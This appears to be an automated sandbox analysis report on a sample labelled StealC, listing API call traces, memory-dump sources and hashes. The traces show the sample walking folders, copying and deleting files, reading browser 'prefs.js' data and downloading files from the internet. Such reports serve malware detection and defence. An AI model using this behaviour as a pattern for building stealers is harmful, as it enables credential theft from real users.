                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                            • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                            • API String ID: 180737720-445461498
                                                                                                                                                                            • Opcode ID: d9f5f8545ddee0b744be88116b2991a9d171aa9b388ea94b56143f9495a02c3e
                                                                                                                                                                            • Instruction ID: 85d29ab3eaacbdea0283d19e55d7701cf761b9800f113bdc31cf9236fd2c555a
                                                                                                                                                                            • Opcode Fuzzy Hash: d9f5f8545ddee0b744be88116b2991a9d171aa9b388ea94b56143f9495a02c3e
                                                                                                                                                                            • Instruction Fuzzy Hash: ED6159B1914219AFCB24EBA0DD49EEA737CBB48700F048688F60996141EB75EB45CF91
                                                                                                                                                                            APIs
                                                                                                                                                                            • wsprintfA.USER32 ref: 00783EC3
                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00783EDA
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00790FAC), ref: 00783F08
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00790FB0), ref: 00783F1E
                                                                                                                                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0078406C
                                                                                                                                                                            • FindClose.KERNEL32(000000FF), ref: 00784081
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                            • String ID: %s\%s
                                                                                                                                                                            • API String ID: 180737720-4073750446
                                                                                                                                                                            • Opcode ID: fb60a0f44b1702cca79143a2342da26176ffb49138c0b6d5ee55fea5d58214c0
                                                                                                                                                                            • Instruction ID: 0151bc34c734c9f9f1ba2326460c842051cb31e101b7502c235c726c07fa45b5
                                                                                                                                                                            • Opcode Fuzzy Hash: fb60a0f44b1702cca79143a2342da26176ffb49138c0b6d5ee55fea5d58214c0
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C515BB1914218EBCB24FBB4DD49EEA737CBB44700F4046C8F65996040EB79AB85DF91
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                              • Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007747EA
                                                                                                                                                                              • Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774801
                                                                                                                                                                              • Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774818
                                                                                                                                                                              • Part of subcall function 007747B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00774839
                                                                                                                                                                              • Part of subcall function 007747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00774849
                                                                                                                                                                            • InternetOpenA.WININET(00790DF7,00000001,00000000,00000000,00000000), ref: 0077610F
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00CFD998), ref: 00776147
                                                                                                                                                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0077618F
                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007761B3
                                                                                                                                                                            • InternetReadFile.WININET(a+x,?,00000400,?), ref: 007761DC
                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0077620A
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00776249
                                                                                                                                                                            • InternetCloseHandle.WININET(a+x), ref: 00776253
                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00776260
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                            • String ID: a+x$a+x
                                                                                                                                                                            • API String ID: 4287319946-1519344589
                                                                                                                                                                            • Opcode ID: 5b18381a78d614363647d51ca389840577181fef94b240dbedc6296476d3cb5c
                                                                                                                                                                            • Instruction ID: d015f776d446a717e06e3dc2575cb90feebd5237906c624963e5ef4084c6a9ae
                                                                                                                                                                            • Opcode Fuzzy Hash: 5b18381a78d614363647d51ca389840577181fef94b240dbedc6296476d3cb5c
                                                                                                                                                                            • Instruction Fuzzy Hash: 4B5180B0950208ABDF20DF50DD49BEE77B8FB04341F108198B609A71C5DB786A89CF95
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007915B8,00790D96), ref: 0077F71E
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,007915BC), ref: 0077F76F
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,007915C0), ref: 0077F785
                                                                                                                                                                            • FindNextFileA.KERNELBASE(000000FF,?), ref: 0077FAB1
                                                                                                                                                                            • FindClose.KERNEL32(000000FF), ref: 0077FAC3
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                            • String ID: prefs.js
                                                                                                                                                                            • API String ID: 3334442632-3783873740
                                                                                                                                                                            • Opcode ID: 833ee9718d9f7762c4634086d6ef686a1fa0a7a3e490a66044297ae241c3d9c5
                                                                                                                                                                            • Instruction ID: a56f7249def4861d376842bda6ef3ed8c497e12d8040d051b8fcc81f5e38b63f
                                                                                                                                                                            • Opcode Fuzzy Hash: 833ee9718d9f7762c4634086d6ef686a1fa0a7a3e490a66044297ae241c3d9c5
                                                                                                                                                                            • Instruction Fuzzy Hash: 64B15171950108EBDF24FF60DD9AAEE7379AF54300F4081A9E40A96141EF3C6B49CBA2
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00795124,?,00771F2C,?,007951CC,?,?,00000000,?,00000000), ref: 00771923
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00795274), ref: 00771973
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,0079531C), ref: 00771989
                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00771D40
                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00771DCA
                                                                                                                                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00771E20
                                                                                                                                                                            • FindClose.KERNEL32(000000FF), ref: 00771E32
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                            • API String ID: 1415058207-1173974218
                                                                                                                                                                            • Opcode ID: 719d4079c2bff020fb83e97501a96d7f23a057a500733e12d7d4a49ce3eece29
                                                                                                                                                                            • Instruction ID: 5185a0b38b4571a83dba480abe7996bf2c39d8857390f489a17d8e48fd310bc5
                                                                                                                                                                            • Opcode Fuzzy Hash: 719d4079c2bff020fb83e97501a96d7f23a057a500733e12d7d4a49ce3eece29
                                                                                                                                                                            • Instruction Fuzzy Hash: 0412C371950118EAEF15FB60DC9AAED7378AF54300F4041EAB50A66091EF3C6F49CFA2
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007914B0,00790C2A), ref: 0077DAEB
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,007914B4), ref: 0077DB33
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,007914B8), ref: 0077DB49
                                                                                                                                                                            • FindNextFileA.KERNELBASE(000000FF,?), ref: 0077DDCC
                                                                                                                                                                            • FindClose.KERNEL32(000000FF), ref: 0077DDDE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3334442632-0
                                                                                                                                                                            • Opcode ID: 70b3803f565bd6bb21a21e529508c0c6bb164e85a4be19cdbdfe523fb53e47e4
                                                                                                                                                                            • Instruction ID: c6276bec7ee827b282deb9d8bf07a0299013f57f40beab0869bc3a7917e16551
                                                                                                                                                                            • Opcode Fuzzy Hash: 70b3803f565bd6bb21a21e529508c0c6bb164e85a4be19cdbdfe523fb53e47e4
                                                                                                                                                                            • Instruction Fuzzy Hash: 08916772910104EBDF14FB70EC5A9ED737DAF84340F408669F90A96151EE3CAB19DBA2
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00790D73), ref: 0077E4A2
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,007914F8), ref: 0077E4F2
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,007914FC), ref: 0077E508
                                                                                                                                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0077EBDF
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
